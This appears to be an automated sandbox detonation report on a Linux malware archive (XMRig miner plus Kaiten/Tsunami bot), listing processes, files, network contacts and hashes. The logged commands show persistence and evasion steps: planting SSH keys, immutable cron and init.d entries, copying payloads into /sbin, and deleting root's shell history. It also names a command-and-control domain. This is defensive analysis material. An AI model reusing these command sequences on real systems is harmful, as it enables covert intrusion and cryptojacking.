Analysis Overview
SHA256
0de9266af49aab24256c289d39e86649d978d5a4c9d0ff2041a22140b88ea688
Threat Level: Known bad
The file myxmrig.tgz was found to be: Known bad.
Malicious Activity Summary
Kaiten/Tsunami
Xmrig family
Kaiten family
Detects Kaiten/Tsunami payload
xmrig
Detects Kaiten/Tsunami Payload
XMRig Miner payload
Adds new SSH keys
Executes dropped EXE
File and Directory Permissions Modification
Writes file to system bin folder
Modifies init.d
Reads hardware information
Checks hardware identifiers (DMI)
Enumerates running processes
Attempts to change immutable files
Creates/modifies Cron job
UPX packed file
Security Software Discovery
Reads CPU attributes
Checks CPU configuration
Writes file to tmp directory
Process Discovery
System Network Configuration Discovery
Reads runtime system information
Enumerates kernel/hardware configuration
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 11:36
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsbe-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.mips
[./.mips -f]
Network
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | a0669fc7ed6e6c80a991b070e1f7909a |
| SHA1 | 313f4f3deaf4237a8d0059593f1a68d7b7cc434f |
| SHA256 | 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b |
| SHA512 | 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/.systemd/-bash | /tmp/.systemd/-bash | N/A |
Enumerates running processes
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/648/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/679/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/476/status | /bin/ps | N/A |
| File opened for reading | /proc/1119/stat | /bin/ps | N/A |
| File opened for reading | /proc/174/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/414/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/183/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/533/stat | /bin/ps | N/A |
| File opened for reading | /proc/1141/stat | /bin/ps | N/A |
| File opened for reading | /proc/1091/stat | /bin/ps | N/A |
| File opened for reading | /proc/668/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1518/status | /bin/ps | N/A |
| File opened for reading | /proc/30/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/31/status | /bin/ps | N/A |
| File opened for reading | /proc/1336/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1253/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1284/stat | /bin/ps | N/A |
| File opened for reading | /proc/18/status | /bin/ps | N/A |
| File opened for reading | /proc/964/stat | /bin/ps | N/A |
| File opened for reading | /proc/1136/status | /bin/ps | N/A |
| File opened for reading | /proc/14/stat | /bin/ps | N/A |
| File opened for reading | /proc/681/stat | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1067/status | /bin/ps | N/A |
| File opened for reading | /proc/1064/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/stat | /bin/ps | N/A |
| File opened for reading | /proc/1237/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/182/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/964/status | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1253/status | /bin/ps | N/A |
| File opened for reading | /proc/967/status | /bin/ps | N/A |
| File opened for reading | /proc/1225/stat | /bin/ps | N/A |
| File opened for reading | /proc/1237/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/25/stat | /bin/ps | N/A |
| File opened for reading | /proc/1485/status | /bin/ps | N/A |
| File opened for reading | /proc/35/status | /bin/ps | N/A |
| File opened for reading | /proc/170/stat | /bin/ps | N/A |
| File opened for reading | /proc/610/status | /bin/ps | N/A |
| File opened for reading | /proc/679/status | /bin/ps | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/6/status | /bin/ps | N/A |
| File opened for reading | /proc/278/status | /bin/ps | N/A |
| File opened for reading | /proc/1284/stat | /bin/ps | N/A |
| File opened for reading | /proc/1119/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1178/status | /bin/ps | N/A |
| File opened for reading | /proc/187/stat | /bin/ps | N/A |
| File opened for reading | /proc/559/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/15/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/187/status | /bin/ps | N/A |
| File opened for reading | /proc/1181/status | /bin/ps | N/A |
| File opened for reading | /proc/179/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/417/status | /bin/ps | N/A |
| File opened for reading | /proc/1305/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/32/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/445/status | /bin/ps | N/A |
| File opened for reading | /proc/460/status | /bin/ps | N/A |
| File opened for reading | /proc/679/stat | /bin/ps | N/A |
| File opened for reading | /proc/1225/status | /bin/ps | N/A |
| File opened for reading | /proc/30/stat | /bin/ps | N/A |
| File opened for reading | /proc/1078/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1141/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/717/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/2/stat | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/-bash | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep -v R]
/bin/grep
[grep ssh$]
/bin/ps
[ps x]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v grep]
/bin/grep
[grep -v R]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .x86_64 -bash]
/tmp/.systemd/-bash
[./-bash]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.7:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/.systemd/-bash
| MD5 | 92dc30d449f563a5bdbba08d4a9d57fc |
| SHA1 | ff609eed2df786396203a8806400566df079cc7f |
| SHA256 | 86db0330a233efe6e11f944833f9e9b7472d7f34595cf693f001d99df641513b |
| SHA512 | 573fa375ddcb6a49690f5168d791af2529a89233d3bf0ff50c2b88686c27e4cef59432e0f6ae71745fecfa2657c23248ad33ea50ac8b9f1c96721f38e3325097 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
1s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
/root/.ssh/authorized_keys
| MD5 | 8fe44e7f210016f1a630679fe2379c1b |
| SHA1 | 2ca1d7e85c3f3f57e93c224df0d6765615969b25 |
| SHA256 | 7e086e2e17f07dcf4f39288e348e14ec7cff52af7aca8b537ed13e2fb3fb4189 |
| SHA512 | 981450e6206dcf76811bec0bc3fa8e87b2fd2ac3234754738a3220d29dc1a61b9e82a00ace865d21c365cc598b9caccf58686deb69be5820a52bcfb9b65eaa9c |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.x86_64
[./.x86_64 -f]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp |
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | b6bd725d6b274dd0e0b8f5535fce571b |
| SHA1 | 419ef40db06a3220262166fa98db357c0ac017fa |
| SHA256 | d2baa726c79e389cb82c2298f854d853aeebc175369f00a4d21eb3dbd03e8bcf |
| SHA512 | c934ad46180bd3e3e3590658ed1f2cc55f48279a099d2bbf852c21af6840f04d9c41f47a8ddf5685e484f76730c4254d85c5c4b4561d9e3d33d1ec089f5e7578 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
1s
Max time network
132s
Command Line
Signatures
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/.systemd/.i686 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.ssh | /tmp/.systemd/.i686 | N/A |
Processes
/tmp/.systemd/.i686
[/tmp/.systemd/.i686]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | pwn.pwndns.pw | udp |
| CA | 51.79.74.212:80 | pwn.pwndns.pw | tcp |
| US | 8.8.8.8:53 | 731FD16D.DDED1D5.2CE4CC06.IP | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
1s
Max time network
132s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Kaiten family
Kaiten/Tsunami
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/exe | /tmp/.systemd/.x86_64 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.ssh | /tmp/.systemd/.x86_64 | N/A |
Processes
/tmp/.systemd/.x86_64
[/tmp/.systemd/.x86_64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | pwn.pwndns.pw | udp |
| CA | 51.79.74.212:80 | pwn.pwndns.pw | tcp |
Files
memory/2817-1-0x000077ec2b386000-0x000077ec2b39a760-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.V7hfn5 | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/wc
[wc -l]
/bin/grep
[grep .systemd]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.8:443 | tcp | |
| US | 1.1.1.1:53 | odrs.gnome.org | udp |
| US | 1.1.1.1:53 | odrs.gnome.org | udp |
| GB | 89.187.167.39:443 | odrs.gnome.org | tcp |
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.V7hfn5
| MD5 | c0cf181774a9fad926645284a3680db5 |
| SHA1 | af146029c4b74552e4bbcb3d6fac3efe25898394 |
| SHA256 | 3d96819b05bc634c0a6c10307757c360512c9af8ff898ee2ae9014e20bffc5a5 |
| SHA512 | 85b7dd7adcfc0b75596b43e5768e06f6e81914b007044286113bc5c26132bffcf2898c912cc492bdad977f1c4d86272fb4fc531fa1ccf5c70cc952721f1cc244 |
/tmp/.systemd/.systemd
| MD5 | 31e12aacb4572270e99f912dfb4e1d2c |
| SHA1 | 942830707a5f7de945e4bf6192c2266bfd529018 |
| SHA256 | f54b32d1e82e3fa5af6e074fdeb416ac8b8581f2cf5ef357d94c9241815228fd |
| SHA512 | be1d751a060eef9e6c5b4d5df4578b2b38631b813ce8d9f7d84563779a1168ce934dad06d39ff501adf47f219531b7a571accb9a857e716a42cb98057010a5d2 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/go
[/tmp/.systemd/go]
/tmp/.systemd/auto
[./auto]
/tmp/.systemd/ntpdate
[./ntpdate]
/tmp/.systemd/.run
[./.run]
/tmp/.systemd/clean
[./clean]
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
149s
Max time network
143s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.update/.x86_64 | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.NdujH4 | /usr/bin/crontab | N/A |
Enumerates running processes
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.update/.x86_64 | N/A |
